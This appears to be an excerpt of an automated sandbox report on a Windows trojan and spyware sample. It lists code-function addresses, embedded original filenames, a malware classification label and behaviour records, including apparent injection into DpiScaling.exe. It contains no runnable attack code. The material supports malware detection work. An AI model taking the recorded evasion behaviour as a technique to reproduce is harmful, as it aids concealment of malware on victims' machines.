Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0042F5A3	4_2_0042F5A3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00410743	4_2_00410743
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00402780	4_2_00402780
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0100	4_2_012B0100
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135A118	4_2_0135A118
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01348158	4_2_01348158
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013801AA	4_2_013801AA
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013741A2	4_2_013741A2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013781CC	4_2_013781CC
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137A352	4_2_0137A352
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE3F0	4_2_012CE3F0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013803E6	4_2_013803E6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013402C0	4_2_013402C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0535	4_2_012C0535
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01380591	4_2_01380591
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01364420	4_2_01364420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01372446	4_2_01372446
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136E4F6	4_2_0136E4F6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E4750	4_2_012E4750
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BC7C0	4_2_012BC7C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DC6E0	4_2_012DC6E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D6962	4_2_012D6962
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0138A9A6	4_2_0138A9A6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CA840	4_2_012CA840
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C2840	4_2_012C2840
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A68B8	4_2_012A68B8
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE8F0	4_2_012EE8F0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137AB40	4_2_0137AB40
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01376BD7	4_2_01376BD7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135CD1F	4_2_0135CD1F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CAD00	4_2_012CAD00
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D8DBF	4_2_012D8DBF
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BADE0	4_2_012BADE0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0C00	4_2_012C0C00
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360CB5	4_2_01360CB5
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0CF2	4_2_012B0CF2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01362F30	4_2_01362F30
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01302F28	4_2_01302F28
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E0F30	4_2_012E0F30
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01334F40	4_2_01334F40
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133EFA0	4_2_0133EFA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CCFE0	4_2_012CCFE0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B2FC8	4_2_012B2FC8
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137EE26	4_2_0137EE26
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0E59	4_2_012C0E59
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137CE93	4_2_0137CE93
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D2E90	4_2_012D2E90
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137EEDB	4_2_0137EEDB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F516C	4_2_012F516C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0138B16B	4_2_0138B16B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AF172	4_2_012AF172
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CB1B0	4_2_012CB1B0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137F0E0	4_2_0137F0E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013770E9	4_2_013770E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C70C0	4_2_012C70C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136F0CC	4_2_0136F0CC
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137132D	4_2_0137132D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AD34C	4_2_012AD34C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0130739A	4_2_0130739A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C52A0	4_2_012C52A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013612ED	4_2_013612ED
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DB2C0	4_2_012DB2C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01377571	4_2_01377571
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135D5B0	4_2_0135D5B0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013895C3	4_2_013895C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137F43F	4_2_0137F43F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B1460	4_2_012B1460
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137F7B0	4_2_0137F7B0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01305630	4_2_01305630
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013716CC	4_2_013716CC
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01355910	4_2_01355910
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C9950	4_2_012C9950
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DB950	4_2_012DB950
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132D800	4_2_0132D800
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C38E0	4_2_012C38E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137FB76	4_2_0137FB76
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DFB80	4_2_012DFB80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01335BF0	4_2_01335BF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012FDBF9	4_2_012FDBF9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01333A6C	4_2_01333A6C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01377A46	4_2_01377A46
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137FA49	4_2_0137FA49
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01305AA0	4_2_01305AA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01361AA3	4_2_01361AA3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135DAAC	4_2_0135DAAC
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136DAC6	4_2_0136DAC6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01377D73	4_2_01377D73
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C3D40	4_2_012C3D40
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01371D5A	4_2_01371D5A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DFDC0	4_2_012DFDC0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01339C32	4_2_01339C32
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137FCF2	4_2_0137FCF2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137FF09	4_2_0137FF09
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137FFB1	4_2_0137FFB1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C1F92	4_2_012C1F92
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01283FD2	4_2_01283FD2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01283FD5	4_2_01283FD5
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C9EB0	4_2_012C9EB0
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694BE4B	8_2_0694BE4B
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_06943677	8_2_06943677
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_069624D7	8_2_069624D7
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_06941AAF	8_2_06941AAF
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_06941897	8_2_06941897
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_06943897	8_2_06943897
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694A047	8_2_0694A047
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694A043	8_2_0694A043
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_069419E7	8_2_069419E7
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048CE4F6	9_2_048CE4F6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048C4420	9_2_048C4420
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D2446	9_2_048D2446
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048E0591	9_2_048E0591
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04820535	9_2_04820535
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0483C6E0	9_2_0483C6E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0481C7C0	9_2_0481C7C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04844750	9_2_04844750
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04820770	9_2_04820770
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048B2000	9_2_048B2000
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048E01AA	9_2_048E01AA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D41A2	9_2_048D41A2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D81CC	9_2_048D81CC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04810100	9_2_04810100
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048BA118	9_2_048BA118
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048A8158	9_2_048A8158
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048A02C0	9_2_048A02C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048C0274	9_2_048C0274
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048E03E6	9_2_048E03E6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0482E3F0	9_2_0482E3F0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DA352	9_2_048DA352
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048C0CB5	9_2_048C0CB5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04810CF2	9_2_04810CF2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04820C00	9_2_04820C00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04838DBF	9_2_04838DBF
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0481ADE0	9_2_0481ADE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0482AD00	9_2_0482AD00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048BCD1F	9_2_048BCD1F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04832E90	9_2_04832E90
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DCE93	9_2_048DCE93
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DEEDB	9_2_048DEEDB
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DEE26	9_2_048DEE26
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04820E59	9_2_04820E59
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0489EFA0	9_2_0489EFA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04812FC8	9_2_04812FC8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0482CFE0	9_2_0482CFE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04862F28	9_2_04862F28
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04840F30	9_2_04840F30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048C2F30	9_2_048C2F30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04894F40	9_2_04894F40
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048068B8	9_2_048068B8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0484E8F0	9_2_0484E8F0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04822840	9_2_04822840
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0482A840	9_2_0482A840
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048229A0	9_2_048229A0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048EA9A6	9_2_048EA9A6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04836962	9_2_04836962
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0481EA80	9_2_0481EA80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D6BD7	9_2_048D6BD7
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DAB40	9_2_048DAB40
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DF43F	9_2_048DF43F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04811460	9_2_04811460
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048BD5B0	9_2_048BD5B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D7571	9_2_048D7571
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D16CC	9_2_048D16CC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04865630	9_2_04865630
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DF7B0	9_2_048DF7B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048CF0CC	9_2_048CF0CC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048270C0	9_2_048270C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D70E9	9_2_048D70E9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DF0E0	9_2_048DF0E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0482B1B0	9_2_0482B1B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048EB16B	9_2_048EB16B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0485516C	9_2_0485516C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0480F172	9_2_0480F172
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048252A0	9_2_048252A0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0483B2C0	9_2_0483B2C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048C12ED	9_2_048C12ED
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0486739A	9_2_0486739A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D132D	9_2_048D132D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0480D34C	9_2_0480D34C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DFCF2	9_2_048DFCF2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04899C32	9_2_04899C32
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0483FDC0	9_2_0483FDC0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04823D40	9_2_04823D40
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D1D5A	9_2_048D1D5A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D7D73	9_2_048D7D73
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04829EB0	9_2_04829EB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04821F92	9_2_04821F92
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DFFB1	9_2_048DFFB1
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DFF09	9_2_048DFF09
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048238E0	9_2_048238E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0488D800	9_2_0488D800
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048B5910	9_2_048B5910
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04829950	9_2_04829950
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0483B950	9_2_0483B950
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04865AA0	9_2_04865AA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048BDAAC	9_2_048BDAAC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048C1AA3	9_2_048C1AA3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048CDAC6	9_2_048CDAC6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DFA49	9_2_048DFA49
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048D7A46	9_2_048D7A46
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04893A6C	9_2_04893A6C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0483FB80	9_2_0483FB80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04895BF0	9_2_04895BF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0485DBF9	9_2_0485DBF9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048DFB76	9_2_048DFB76
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00622560	9_2_00622560
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0063C290	9_2_0063C290
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0061D430	9_2_0061D430
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0061B646	9_2_0061B646
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0061B650	9_2_0061B650
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0061D650	9_2_0061D650
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0061B7A0	9_2_0061B7A0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0061B795	9_2_0061B795
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0061B868	9_2_0061B868
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00625C10	9_2_00625C10
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00623DFC	9_2_00623DFC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00623E00	9_2_00623E00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0452E69C	9_2_0452E69C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0452D768	9_2_0452D768
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0452E1E8	9_2_0452E1E8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_045351AC	9_2_045351AC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0453534D	9_2_0453534D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_0452E303	9_2_0452E303

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0488EA12 appears 86 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0480B970 appears 280 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0489F290 appears 105 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 04867E54 appears 106 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 04855130 appears 58 times
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: String function: 012F5130 appears 58 times
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: String function: 01307E54 appears 111 times
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: String function: 0133F290 appears 105 times
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: String function: 012AB970 appears 280 times
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: String function: 0132EA12 appears 86 times

Source: 4p5XLVXJnq.exe	Binary or memory string: OriginalFilename vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000000.00000002.2246329189.0000000007740000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000000.00000002.2233283066.0000000004369000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000000.00000000.2062435642.0000000000E52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefJaj.exeL vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000000.00000002.2246911538.0000000007860000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000000.00000002.2222596545.00000000033A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000000.00000002.2221247624.000000000158E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000004.00000002.2498176103.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDPISCALING.EXEj% vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe, 00000004.00000002.2499471610.00000000013AD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 4p5XLVXJnq.exe
Source: 4p5XLVXJnq.exe	Binary or memory string: OriginalFilenamefJaj.exeL vs 4p5XLVXJnq.exe

Source: 4p5XLVXJnq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4p5XLVXJnq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/7@11/8

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4p5XLVXJnq.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ot3dry14.mb0.ps1

Jump to behavior

Source: 4p5XLVXJnq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4p5XLVXJnq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DpiScaling.exe, 00000009.00000002.3910070934.0000000000933000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2706812558.0000000000933000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3910070934.0000000000960000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2709017876.000000000093E000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2706696061.0000000000913000.00000004.00000020.00020000.00000000.sdmp

